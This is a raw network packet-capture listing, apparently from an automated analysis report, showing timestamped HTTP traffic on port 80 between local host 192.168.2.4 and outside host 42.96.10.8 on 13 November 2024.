                                                                                                                                                                                                            Nov 13, 2024 13:25:22.099061012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.099071026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.099087000 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.099248886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.099287033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.099376917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.099387884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.099397898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.099411011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.099416971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.099459887 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.101164103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.118830919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.118845940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.118856907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.118881941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.118907928 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.118983984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.118995905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.119036913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122260094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122281075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122292042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122320890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122345924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122356892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122369051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122380972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122390032 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122400045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122406006 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122410059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122432947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122457027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122467995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122478962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122488976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122498989 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122529030 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122543097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122553110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122582912 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122661114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122701883 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122701883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122714043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122745037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122755051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122771978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122800112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122805119 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122811079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122822046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122831106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122852087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122874022 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122895956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122906923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122916937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122926950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122931957 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122940063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122950077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122958899 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122960091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122975111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122983932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.122997046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.123017073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.123380899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.123420954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.123445034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.123456001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.123466015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.123487949 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.123517036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.123527050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.123559952 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.123656988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.123667955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.123677015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.123684883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.123702049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.123703003 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.123717070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.123725891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.123727083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.123739958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.123749018 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.123752117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.123761892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.123764038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.123775005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.123792887 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.123812914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124054909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124073982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124083042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124124050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124140978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124155998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124169111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124175072 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124181032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124205112 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124267101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124296904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124303102 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124310970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124320030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124330997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124340057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124349117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124351025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124366999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124375105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124378920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124382019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124389887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124420881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124423027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124437094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124447107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124463081 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124476910 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124932051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.124964952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125000000 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125016928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125027895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125060081 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125080109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125092030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125127077 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125133991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125145912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125154972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125165939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125174999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125179052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125212908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125264883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125276089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125302076 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125325918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125339985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125370026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125379086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125389099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125401020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125401020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125411034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125422001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125431061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125431061 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125442028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125454903 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125478029 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125627995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125638008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125648022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125658989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125670910 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125689030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125699043 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125704050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125715017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125722885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125731945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125741005 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125744104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125756025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125756025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125776052 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125844002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125855923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125864029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125874043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125889063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125895023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125895023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125907898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125915051 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125919104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125930071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125933886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125945091 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125967979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125983953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.125996113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126004934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126017094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126024961 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126029015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126041889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126056910 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126079082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126107931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126118898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126130104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126140118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126147985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126148939 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126167059 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126255035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126264095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126272917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126283884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126291990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126301050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126302004 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126312017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126324892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126331091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126341105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126352072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126355886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126372099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126389980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126415014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126425028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126425982 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126446962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126456022 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126458883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126467943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126477957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126487017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126497030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126502037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126508951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126518965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126528025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126528978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126542091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126553059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126555920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126571894 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126593113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126605988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126627922 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126688004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126699924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126710892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126722097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126734018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126744986 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126758099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126770973 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126800060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126811028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126821041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126830101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126840115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126844883 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126852989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126869917 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.126893997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127067089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127078056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127088070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127115011 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127134085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127151966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127161980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127165079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127173901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127183914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127192974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127202988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127203941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127227068 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127249002 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127252102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127264023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127273083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127283096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127294064 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127315998 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127319098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127330065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127350092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127358913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127365112 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127372980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127381086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127403975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127414942 CET4973380192.168.2.442.96.10.8
